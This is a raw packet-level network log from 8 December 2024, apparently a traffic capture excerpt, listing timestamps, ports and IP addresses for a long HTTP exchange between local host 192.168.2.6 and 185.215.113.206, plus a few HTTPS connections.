Dec 8, 2024 13:31:48.500447035 CET	49844	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.500583887 CET	49843	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.500586987 CET	49844	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.500597954 CET	443	49844	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.500600100 CET	443	49843	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.503938913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.504031897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.504059076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.504074097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.512017012 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.512089968 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.512124062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.512224913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.520298004 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.520452976 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.625633955 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.625787973 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.625818968 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.628043890 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.628194094 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.628302097 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.630151987 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.632078886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.632177114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.635302067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.637283087 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.637379885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.637430906 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.642286062 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.642379999 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.642409086 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.642678976 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.647000074 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.647102118 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.647166967 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.647397995 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.651910067 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.651999950 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.652053118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.652139902 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.656949043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.657027006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.657269001 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.661554098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.661662102 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.661706924 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.661788940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.666385889 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.666474104 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.666498899 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.666714907 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.671375036 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.671503067 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.671503067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.671627045 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.676094055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.676179886 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.676197052 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.676290035 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.680927038 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.680996895 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.681020975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.681049109 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.685800076 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.685862064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.685909986 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.685992956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.690630913 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.690679073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.690742016 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.690824032 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.692560911 CET	443	49839	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.693025112 CET	49839	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.693046093 CET	443	49839	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.693533897 CET	49839	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:48.693538904 CET	443	49839	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:48.695485115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.695593119 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.695621014 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.695724010 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.700400114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.700503111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.700517893 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.700577974 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.705171108 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.705243111 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.705286980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.705420971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.710040092 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.710206985 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.710230112 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.710359097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.714819908 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.714925051 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.817925930 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.818054914 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.818097115 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.818209887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.819787025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.819904089 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.820138931 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.823704958 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.823864937 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.823889971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.823924065 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.827501059 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.827608109 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.827625990 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.827699900 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.831187963 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.831296921 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.831417084 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.834927082 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.835124969 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.835254908 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.838545084 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.838705063 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.838731050 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.838794947 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.842026949 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.842180967 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.842191935 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.842328072 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.845525026 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.845604897 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.845890045 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.848978043 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.849059105 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.849179029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.852528095 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.852638006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.852693081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.852693081 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.856045961 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.856116056 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.856142998 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.858273029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.859478951 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.859601974 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.859625101 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.862272978 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.862945080 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.863082886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.863151073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.863151073 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.866509914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.866579056 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.866604090 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.869947910 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.869978905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.870006084 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.870381117 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.873570919 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.873620033 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.873625994 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.873703957 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.876916885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.876980066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.877017021 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.877057076 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.880470037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.880515099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.880634069 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.880748987 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.883922100 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.884001970 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.884052992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.887526989 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.887577057 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.887790918 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.887839079 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.891055107 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.891134977 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.891156912 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.891170025 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.894567966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.894618988 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.894640923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.894870996 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.897949934 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.898001909 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.898037910 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.898081064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.901365042 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.901508093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.901508093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.901546001 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.904845953 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.904911995 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.904985905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.905031919 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.908406019 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.908462048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.908483982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.908571005 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.911850929 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.911904097 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.911953926 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.911989927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.915375948 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.915532112 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.915551901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.915589094 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.918879986 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.919030905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.919084072 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.922377110 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.922418118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:48.922422886 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:48.922485113 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.009979963 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.010035992 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.010106087 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.010144949 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.011502981 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.011552095 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.011972904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.012049913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.012119055 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.012162924 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.014908075 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.014985085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.015048981 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.015090942 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.017781973 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.017838001 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.017880917 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.017987967 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.020737886 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.020790100 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.020855904 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.020903111 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.023441076 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.023493052 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.023566008 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.023605108 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.026251078 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.026320934 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.026355982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.026400089 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.028789997 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.028836012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.028899908 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.028991938 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.031387091 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.031439066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.031533003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.031589031 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.033984900 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.034040928 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.034080982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.034245968 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.036530972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.036573887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.036604881 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.036650896 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.039079905 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.039139032 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.039177895 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.039216042 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.041621923 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.041666031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.041692972 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.041716099 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.044020891 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.044069052 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.044116020 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.044173956 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.046463966 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.046514034 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.046598911 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.046638966 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.048849106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.048912048 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.048921108 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.048959970 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.051204920 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.051260948 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.051337957 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.051378012 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.053566933 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.053608894 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.053632975 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.053679943 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.055936098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.056010008 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.056042910 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.056083918 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.056107998 CET	443	49841	23.206.197.42	192.168.2.6
Dec 8, 2024 13:31:49.056174040 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:49.058283091 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.058337927 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.058609962 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.058660984 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.059519053 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:49.059530020 CET	443	49841	23.206.197.42	192.168.2.6
Dec 8, 2024 13:31:49.059762001 CET	443	49841	23.206.197.42	192.168.2.6
Dec 8, 2024 13:31:49.059937000 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:49.060693979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.060832024 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.060879946 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.061683893 CET	49841	443	192.168.2.6	23.206.197.42
Dec 8, 2024 13:31:49.063052893 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.063098907 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.063165903 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.063214064 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.065455914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.065517902 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.065522909 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.065557957 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.067764044 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.067823887 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.067944050 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.067994118 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.070105076 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.070157051 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.070224047 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.070363045 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.072474003 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.072518110 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.072554111 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.072591066 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.074815989 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.074858904 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.074981928 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.075063944 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.077176094 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.077231884 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.077270031 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.077307940 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.079543114 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.079593897 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.079627991 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.079662085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.081901073 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.081953049 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.081990957 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.082093000 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:49.084266901 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:49.084312916 CET	49835	80	192.168.2.6	185.215.113.206
